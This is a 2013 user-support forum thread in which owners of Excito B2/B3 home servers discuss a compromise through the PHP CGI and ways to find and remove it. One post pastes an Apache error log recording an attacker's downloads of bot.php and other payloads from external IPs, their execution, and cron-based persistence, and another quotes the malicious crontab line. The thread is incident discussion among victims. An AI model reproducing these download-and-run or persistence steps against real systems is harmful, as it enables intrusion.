New user's registration have been closed due to high spamming and low trafic on this forum. Please contact forum admins directly if you need an account. Thanks !

I have been attacked and don't know why.

Got problems with your B2 or B3? Share and get helped!
Binkem
Posts: 388
Joined: 10 Jul 2008, 02:26

Re: I have been attacked and don't know why.

Post by Binkem »

Hi,

I'm finding the
b>Security Alert!</b> The PHP CGI cannot be accessed directly.
lines in my error.log. I connot find any cronjobs on my B3 (typing crontab -e as www-data, root and myself.

Does this mean that i'm not (yet) infected? Or am i looking in the worng place.

Martijn
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

They got me as well... I found an entry to stablehost.us in the crontab for www-data
and two hidden files in /dev/shm/ that contained the malware payload.

:(
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

So why exactly does www-data have a valid shell on the B3?
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername »

I was wondering the same thing myself. I checked my /dev/shm and there are no hidden files there.
toukie
Posts: 115
Joined: 13 Jan 2012, 12:22

Re: I have been attacked and don't know why.

Post by toukie »

Same stuff in logs here plus this in crontab www-data:
* * * * * /tmp/.UNIX/update >/dev/null 2>&1
Ubi
Posts: 1549
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi »

so I guess it's safe to say there are multiple attacks that use the same point of entry, but have a slightly different payload.
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername »

Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Gordon
Posts: 1461
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon »

RandomUsername wrote:Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Not likely. I see similar attempts on my B3 and I can state for a fact that they are not using the myownb3 host names.
toukie
Posts: 115
Joined: 13 Jan 2012, 12:22

Re: I have been attacked and don't know why.

Post by toukie »

What is the fix for this?

I have ". .. network" in /dev/shm. What does that say?
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

hello,

Under attack as well.

how can i check the cron-job for www-data ??

in my errorlog i found:

Code: Select all

[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: c:windowssystem32cmd.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] %TEMP%x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: bitsadmin: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] cannot create ik: Permission denied
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh:
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ftp: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: del: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: x.exe: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/lol
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- ftp://ftp:*password*@80.79.48.186/bot.php
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] => `bot.php'
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 80.79.48.186:21...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:00-- http://74.52.9.186/c
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logging in as ftp ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] Logged in!
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] ==> SYST ...
[Sun Nov 03 14:43:00 2013] [error] [client 37.187.77.137] done. ==> PWD ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> TYPE I ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> CWD not needed.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> SIZE bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 15138
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ==> PASV ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done. ==> RETR bot.php ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] done.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] Length: 15138 (15K) (unauthoritative)
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 0K ..
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] ...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] . .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] .. 100% 158K=0.09s
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:01 (158 KB/s) - `bot.php' saved [15138]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:01 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 6906 (6.7K) [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `lol'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K .
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Length: 256 [text/plain]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] Saving to: `c'
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137] 0K 100% 8.55M=0s
[Sun Nov 03 14:43:04 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:04 (8.55 MB/s) - `c' saved [256/256]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:05-- http://74.52.9.186/a
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80...
[Sun Nov 03 14:43:05 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] .
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] ..
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] . 100% 3.33K=2.0s
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:06 (3.33 KB/s) - `lol' saved [6906/6906]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: curl: not found
[Sun Nov 03 14:43:06 2013] [error] [client 37.187.77.137] sh: fetch: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 1:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] \x7fELF\x01\x01\x01\x02\x03\x01\xb8%@44: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 2:
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ,\xe3\x8a\x10^=^=^=\x14\x15\x02\xfb\xff\xff\xff#!/usr/bin/perl: not found
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:07 2013] [error] [client 37.187.77.137] ./lol: 5: Syntax error: "(" unexpected
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] connected.
[Sun Nov 03 14:43:09 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response...
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 200 OK
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Length: 712 [text/plain]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] Saving to: `a'
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 0K 100% 21.4M=0s
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:14 (21.4 MB/s) - `a' saved [712/712]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] no crontab for www-data
[Sun Nov 03 14:43:14 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:14-- http://74.52.9.186/update
[Sun Nov 03 14:43:24 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Length: 208 [text/plain]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] Saving to: `update'
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 0K 100% 6.40M=0s
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] 2013-11-03 14:43:28 (6.40 MB/s) - `update' saved [208/208]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] cp: cannot create regular file `/etc/cron.hourly/update': Permission denied
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: No such file or directory while trying to stat bash
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on dmgshm
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Operation not supported while reading flags on ftdaemon
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-hdroogers
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while reading flags on mc-root
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] chattr: Permission denied while setting flags on shallalist.tar
[Sun Nov 03 14:43:28 2013] [error] [client 37.187.77.137] --2013-11-03 14:43:28-- http://74.52.9.186/clamav
[Sun Nov 03 14:43:30 2013] [error] [client 37.187.77.137] Connecting to 74.52.9.186:80... connected.
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] HTTP request sent, awaiting response... 200 OK
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Length: 379680 (371K) [text/plain]
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137] Saving to: `clamav'
[Sun Nov 03 14:43:34 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:43:40 2013] [error] [client 37.187.77.137] 0K .......... .......... .......... .......... .......... 13% 8.69K 37s
[Sun Nov 03 14:43:45 2013] [error] [client 37.187.77.137] 50K .......... .......... .......... .......... .......... 26% 10.4K 29s
[Sun Nov 03 14:43:51 2013] [error] [client 37.187.77.137] 100K .......... .......... .......... .......... .......... 40% 8.04K 25s
[Sun Nov 03 14:43:57 2013] [error] [client 37.187.77.137] 150K .......... .......... .......... .......... .......... 53% 8.25K 19s
[Sun Nov 03 14:44:07 2013] [error] [client 37.187.77.137] 200K .......... .......... .......... .......... .......... 67% 5.24K 16s
[Sun Nov 03 14:44:20 2013] [error] [client 37.187.77.137] 250K .......... .......... .......... .......... .......... 80% 3.92K 11s
[Sun Nov 03 14:44:28 2013] [error] [client 37.187.77.137] 300K .......... .......... .......... .......... .......... 94% 5.38K 3s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 350K .......... .......... 100% 9.49K=57s
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] 2013-11-03 14:44:31 (6.55 KB/s) - `clamav' saved [379680/379680]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 19: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill: 20: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] kill -l [exitstatus]
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] ./bash: 1: Syntax error: "(" unexpected
[Sun Nov 03 14:44:31 2013] [error] [client 37.187.77.137] chattr: Operation not permitted while setting flags on bash
[Sun Nov 03 14:48:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Sun Nov 03 14:48:01 2013] [error] [client 37.187.77.137] Script timed out before returning headers: php
[Sun Nov 03 14:53:01 2013] [warn] [client 37.187.77.137] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
i think this is not ok.... ftp access was not enabled!!

What can i do best?

Puma
Last edited by Puma on 03 Nov 2013, 14:26, edited 1 time in total.
Linux is like a wigwam - no windows, no gates, apache inside!
DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM »

RandomUsername wrote:Seems odd that we would all be victim. I wonder I someone is targeting all hosts at myownb3.com.
Nope. I have my own .se domain, I've never used myownb3.com.

I'm in Sweden, on dynamic IP (I've had the same IP for some years now though). The IP is 88.206.x.x, I doubt that anyone else here is in the same range.

I'm out of guesses now, but it sure doesn't feel like coincidence...

/Daniel
DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM »

Puma wrote:how can i check the cron-job for www-data ??
You can (logged in as root) do either "crontab -u www-data -l" to list all cron jobs for www-data or "crontab -u www-data -e" to open up an editor (I think you'll get nano) for the jobs. Just delete the rows that shouldn't be there and save with ctrl-x. You might want to take a copy of the rows first so that you can check what they did.

/Daniel
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

seems we all are attacked!

Puma
Linux is like a wigwam - no windows, no gates, apache inside!
Gordon
Posts: 1461
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon »

Puma wrote:Thanks Daniel,

Deleted the * * * * * /tmp/.UNIX/update >/dev/null 2>&1 in my crontab

seems we all are attacked!

Puma
That sounds a bit like jumping to conclusions to me. Also, on my B3 I do not have the exact same log entries as quoted here, but that may be the result of my webserver not responding correctly for this exploit (I do not have Apache running on the exposed B3, but Nginx).
However, if all of you can match times at which the attacks occurred, that could point to someone being able to access the logs of either this forum or the Excito update site.
Puma
Posts: 230
Joined: 29 Sep 2008, 06:30

Re: I have been attacked and don't know why.

Post by Puma »

Youre probably right,

My fathers B2 was not attacked (vs 2.6 uses update but not forum)
My brother in law B3 was not attacked (vs 2.5 without forum)

Can excito check the access of the logs?

Are there countermeasures which we can take other than deleting www-data cron jobs and/or tmp/entries?

Puma
Linux is like a wigwam - no windows, no gates, apache inside!
Post Reply